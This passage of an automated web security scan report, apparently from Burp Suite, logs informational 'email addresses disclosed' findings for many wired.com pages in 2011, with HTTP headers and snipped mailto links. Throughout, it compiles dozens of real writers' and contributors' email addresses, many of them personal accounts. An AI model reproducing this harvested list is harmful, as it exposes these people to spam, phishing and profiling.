Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:23 GMT
Date: Wed, 12 Jan 2011 15:39:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:wired@tweney.com">
...[SNIP]...
<a href="mailto:wired@tweney.com">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:brian_chen@wired.com">
...[SNIP]...
<a href="mailto:mike_isaac@wired.com">
...[SNIP]...
<a href="mailto:mike@wired.com">
...[SNIP]...
<a href="mailto:gadgetnews@wired.com">
...[SNIP]...

7.13. http://www.wired.com/gamelife/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gamelife/

Issue detail

The following email addresses were disclosed in the response:

Lewis_Wallace@wired.com
feitclub@gmail.com
jschreier@gmail.com
plinky92092@gmail.com
wiredkohler@gmail.com

Request

Response

7.14. http://www.wired.com/geekdad/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/geekdad/

Issue detail

The following email addresses were disclosed in the response:

anton@geekdad.com
brad@geekdad.com
canderson@wiredmag.com
chuck@geekdad.com
corrina@geekdad.com
corrinal@cox.net
curtis@geekdad.com
dand@geekdad.com
dave@geekdad.com
doug@geekdad.com
editor@gamepeople.co.uk
fitzwillie@me.com
jason@geekdad.com
jenny@geekdad.com
john@geekdad.com
johnb@geekdad.com
jonathan@geekdad.com
kathy@geekdad.com
ken@geekdad.com
matt@geekdad.com
matthew.d.morgan@gmail.com
michael@geekdad.com
natania@geekdad.com
nathan@geekdad.com
paul@geekdad.com
russ@geekdad.com
tony@geekdad.com
z@geekdad.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:32:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=66
Expires: Wed, 12 Jan 2011 15:40:53 GMT
Date: Wed, 12 Jan 2011 15:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:editor@gamepeople.co.uk">
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:corrinal@cox.net">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:matthew.d.morgan@gmail.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:canderson@wiredmag.com">
...[SNIP]...
<a href="mailto:john@geekdad.com">
...[SNIP]...
<a href="mailto:dave@geekdad.com">
...[SNIP]...
<a href="mailto:natania@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
<a href="mailto:johnb@geekdad.com">
...[SNIP]...
<a href="mailto:kathy@geekdad.com">
...[SNIP]...
<a href="mailto:doug@geekdad.com">
...[SNIP]...
<a href="mailto:dand@geekdad.com">
...[SNIP]...
<a href="mailto:paul@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:jason@geekdad.com">
...[SNIP]...
<a href="mailto:corrina@geekdad.com">
...[SNIP]...
<a href="mailto:chuck@geekdad.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:brad@geekdad.com">
...[SNIP]...
<a href="mailto:russ@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:curtis@geekdad.com">
...[SNIP]...
<a href="mailto:tony@geekdad.com">
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...

7.15. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

Issue detail

The following email addresses were disclosed in the response:

anton@geekdad.com
brad@geekdad.com
canderson@wiredmag.com
chuck@geekdad.com
corrina@geekdad.com
curtis@geekdad.com
dand@geekdad.com
dave@geekdad.com
doug@geekdad.com
fitzwillie@me.com
jason@geekdad.com
jenny@geekdad.com
john@geekdad.com
johnb@geekdad.com
jonathan@geekdad.com
kathy@geekdad.com
ken@geekdad.com
matt@geekdad.com
michael@geekdad.com
natania@geekdad.com
nathan@geekdad.com
paul@geekdad.com
russ@geekdad.com
tony@geekdad.com
z@geekdad.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=447
Expires: Wed, 12 Jan 2011 15:47:21 GMT
Date: Wed, 12 Jan 2011 15:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:canderson@wiredmag.com">
...[SNIP]...
<a href="mailto:john@geekdad.com">
...[SNIP]...
<a href="mailto:dave@geekdad.com">
...[SNIP]...
<a href="mailto:natania@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
<a href="mailto:johnb@geekdad.com">
...[SNIP]...
<a href="mailto:kathy@geekdad.com">
...[SNIP]...
<a href="mailto:doug@geekdad.com">
...[SNIP]...
<a href="mailto:dand@geekdad.com">
...[SNIP]...
<a href="mailto:paul@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:jason@geekdad.com">
...[SNIP]...
<a href="mailto:corrina@geekdad.com">
...[SNIP]...
<a href="mailto:chuck@geekdad.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:brad@geekdad.com">
...[SNIP]...
<a href="mailto:russ@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:curtis@geekdad.com">
...[SNIP]...
<a href="mailto:tony@geekdad.com">
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...

7.16. http://www.wired.com/js/videos/MobileCompatibility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/js/videos/MobileCompatibility.js

Issue detail

The following email address was disclosed in the response:

ahand@hand-interactive.com

Request

GET /js/videos/MobileCompatibility.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 15:11:05 GMT
Date: Wed, 12 Jan 2011 15:01:05 GMT
Connection: close
Content-Length: 25629

/**
* Copyright (C) 2005 Brightcove, Inc. All Rights Reserved. No
* use, copying or distribution of this work may be made except in
* accordance with a valid license agreement from Brightcove,
...[SNIP]...
*******************************/
/**********************************************************************************************************************/

// JavaScript Document

// Anthony Hand, ahand@hand-interactive.com
// Web: www.hand-interactive.com
//
// License info: http://creativecommons.org/licenses/by/3.0/us/

//Initialize some initial string variables we'll look for later.
var deviceIphone = "iphone"
...[SNIP]...

7.17. http://www.wired.com/magazine/decode/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/magazine/decode/

Issue detail

The following email addresses were disclosed in the response:

britadagostino@yahoo.com
cbaker@wired.com
decodewired@gmail.com
diszaster@gmail.com
drsudoku@gmail.com
mandersen@argn.com
mike@lonesharkgames.com
teeuwynn@lonesharkgames.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:04:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:46:19 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:diszaster@gmail.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mandersen@argn.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mandersen@argn.com">
...[SNIP]...
<a href="mailto:britadagostino@yahoo.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mike@lonesharkgames.com">
...[SNIP]...
<a href="decodewired@gmail.com">decodewired@gmail.com</a>
...[SNIP]...
<a href="decodewired@gmail.com">decodewired@gmail.com</a>
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:cbaker@wired.com">
...[SNIP]...
<a href="mailto:mike@lonesharkgames.com">
...[SNIP]...
<a href="mailto:teeuwynn@lonesharkgames.com">
...[SNIP]...

7.18. http://www.wired.com/playbook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/playbook/

Issue detail

The following email addresses were disclosed in the response:

brian.mossop@gmail.com
erik_malinowski@wired.com
joe@joelindsey.com
kyle.stack@gmail.com
mark_mcclusky@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:joe@joelindsey.com">
...[SNIP]...
<a href="mailto:kyle.stack@gmail.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:mark_mcclusky@wired.com">
...[SNIP]...
<a href="mailto:brian.mossop@gmail.com">
...[SNIP]...
<a href="mailto:kyle.stack@gmail.com">
...[SNIP]...
<a href="mailto:joe@joelindsey.com">
...[SNIP]...

7.19. http://www.wired.com/rawfile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/rawfile/

Issue detail

The following email addresses were disclosed in the response:

James_Merithew@wired.com
blaark@gmail.com
eecue@eecue.com
heybobg@mac.com
jon_snyder@wired.com
keith@wired.com
lovebryan@gmail.com
mattcalifornia@hotmail.com
matthew_shechmeister@yahoo.com
twigabrook@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:56 GMT
Date: Wed, 12 Jan 2011 15:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:heybobg@mac.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:keith@wired.com">
...[SNIP]...
<a href="mailto:James_Merithew@wired.com">
...[SNIP]...
<a href="mailto:jon_snyder@wired.com">
...[SNIP]...
<a
href="mailto:matthew_shechmeister@yahoo.com">
...[SNIP]...
<a href="mailto:lovebryan@gmail.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:blaark@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...

7.20. http://www.wired.com/thisdayintech/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/thisdayintech/

Issue detail

The following email addresses were disclosed in the response:

alittlechinmusic@yahoo.com
randy_alfred@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:01:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:12 GMT
Date: Wed, 12 Jan 2011 15:40:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...

7.21. http://www.wired.com/threatlevel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:21:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:52 GMT
Date: Wed, 12 Jan 2011 15:27:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.22. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2006/04/reporter_vs_sub/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.23. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/hacking-the-hacker-stereotypes/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.24. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/transcending-the-human-diy-style/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.25. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.26. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/birgitta-jonsdottir/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.27. http://www.wired.com/threatlevel/2011/01/codebreakers-death/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/codebreakers-death/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.28. http://www.wired.com/threatlevel/2011/01/dubai-assassination/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/dubai-assassination/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.29. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/secret-tanning-camera/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.30. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/vf-wikieaks/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.31. http://www.wired.com/threatlevel/2011/01/video-poker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/video-poker/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.32. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:30 +0000
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:06 GMT
Date: Wed, 12 Jan 2011 15:27:06 GMT
Content-Length: 56148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.34. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:29 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=386
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:27:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.35. http://www.wired.com/threatlevel/author/kimzetter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/author/kimzetter/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=331
Expires: Wed, 12 Jan 2011 15:33:34 GMT
Date: Wed, 12 Jan 2011 15:28:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
